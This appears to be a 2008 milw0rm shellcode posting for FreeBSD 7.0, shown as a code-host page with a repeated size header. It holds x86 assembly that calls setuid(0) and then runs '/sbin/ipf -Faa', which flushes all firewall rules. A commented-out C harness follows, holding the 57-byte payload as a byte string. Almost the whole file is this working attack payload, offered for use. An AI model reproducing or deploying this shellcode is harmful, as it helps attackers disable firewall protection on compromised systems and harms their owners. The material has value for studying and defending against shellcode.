68 lines
No EOL
1.3 KiB
NASM
68 lines
No EOL
1.3 KiB
NASM
; sm4x - 2008
|
|
; setuid(0); execve("//sbin/ipf", {"//sbin/ipf", "-Faa", 0}, 0);
|
|
; 57 bytes
|
|
; FreeBSD 7.0-RELEASE
|
|
|
|
global _start
|
|
|
|
_start:
|
|
main:
|
|
|
|
; --------------------- setuid (0)
|
|
xor eax, eax
|
|
xor ecx, ecx
|
|
push eax
|
|
push eax
|
|
mov al, 0x17
|
|
int 0x80
|
|
; --------------------- -Faa
|
|
xor eax, eax
|
|
push eax
|
|
push 0x6161462d ; -Faa
|
|
mov ecx, esp
|
|
|
|
; --------------------- setup //sbin/ipf
|
|
push eax
|
|
push word 0x6670
|
|
push 0x692f6e69
|
|
push 0x62732f2f
|
|
mov ebx, esp
|
|
|
|
; ---------------------- array setup
|
|
push eax
|
|
push ecx
|
|
push ebx
|
|
mov ecx, esp
|
|
|
|
; ---------------------- call to execve
|
|
push eax
|
|
push ecx
|
|
push ebx
|
|
|
|
mov al, 0x3b
|
|
push eax
|
|
int 0x80
|
|
|
|
xor eax, eax
|
|
push eax
|
|
push eax
|
|
int 0x80
|
|
|
|
/*
|
|
|
|
char code[] = "\x31\xc0\x31\xc9\x50\x50\xb0\x17\xcd \x80"
|
|
"\x31\xc0\x50\x68\x2d\x46\x61\x61\x89\xe1"
|
|
"\x50\x66\x68\x70\x66\x68\x69\x6e\x2f\x69"
|
|
"\x68\x2f\x2f\x73\x62\x89\xe3\x50\x51\x53"
|
|
"\x89\xe1\x50\x51\x53\xb0\x3b\x50\xcd\x80"
|
|
"\x31\xc0\x50\x50\xcd\x80";
|
|
|
|
int main(int argc, char **argv) {
|
|
int (*func)();
|
|
printf("Bytes: %d\n", sizeof(code));
|
|
func = (int (*)()) code;
|
|
}
|
|
|
|
*/
|
|
|
|
// milw0rm.com [2008-08-21] |